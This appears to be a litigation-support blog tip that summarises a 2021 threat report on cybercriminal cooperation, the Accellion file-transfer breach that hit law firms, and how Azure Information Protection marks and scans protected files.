LITIGATION SUPPORT TIP OF THE NIGHT

CrowdStrike is a leading American cybersecurity company, that took the lead into the investigation of Russia's hacking of the Democratic National Committee's email back in 2016. As detailed in a recent ZDNet article, CrowdStrike has released a Global Threat Report for 2021, which illustrates how cyber criminals cooperate with one another.

Some groups specialize in providing services such as ransomware, and malware kits. Webinject kits will add JavaScript into browsers which alters the information shown to a user. An additional box can be added to an online form that will prompt a user to enter confidential information such as a social security number.

Others focus on distribution by facilitating spamming or running traffic distribution systems. TDS systems direct users from one site to another from which malware can be installed.

Money mules are people who may believe they are working as a payment processing agent, but are in fact transferring funds sent by the victims of cyber attacks to the mule's bank account on to the hackers via Western Union which has a payment system that cannot be traced. Dump shops or CVV (card verification value) shops offer credit card account information for sale at around $20 per account, so others can prepare cards with the data.

The widely used secure file transfer service, Accellion File Transfer Appliance, was compromised by hackers this past December. Accellion posted a notice about the attack, and issued an update for the FTA service which addresses the flaws which allowed the hackers to gain access to data.

Two large law firms, Jones Day LLP and Goodwin LLP, have had data compromised by the Accellion breach. Data transferred by Jones Day to outside parties via Accellion was stolen by the Cl0p ransomware site, but the law firm's network was not actually compromised. In a report by Vice News, Cl0p claims to have take up to 5 GB of data from Jones Day.

Accellion FTA was vulnerable because it is currently near its 'End of Life' - support for Accellion will be discontinued on April 30, 2021. See the notice posted by Accellion here. Accellion has a different file transfer service, kiteworks, which has an entirely different code base - the source code is not the same as that used for Accellion FTA. See this notice.

So, if you receive a file transfer 'FTP' link that indicates it was 'Secured by Accellion', you may want to confirm that the sender has upgraded to Accellion kiteworks, or at least installed patches for FTA since January.

The Tip of the Night for April 28, 2018 discussed Azure Information Protection, which allows Microsoft 365 to classify and protect files meeting certain criteria. Protected files must be authenticated - individual users must be authorized to access them. The way in which files are used can also be restricted, and the use of the files can be logged using the AIP system.

Azure Information Protection Viewer is a separate application needed to view these protected files.

You can spot these files by the 'p' added to the beginning of the file extension. For example, a protected text file will have the extension, '.ptxt'.

The AIP system cannot be used to protect .exe, .bat., .pst, and other common system files. Email .msg files; rich text format .rtf files, and compressed .rar files are not protected by default when the AIP scanner is used. AIP's ability to scan .rtf files is limited even when it is enabled to do so.

AIP can successfully scan zip files, but an admin must use a special PowerShell command. The file name for a protected zip file will be changed to 'name.zip.pfile'.

A different PowerShell command is used to OCR TIFF images, and scan them for sensitive information which should be protected.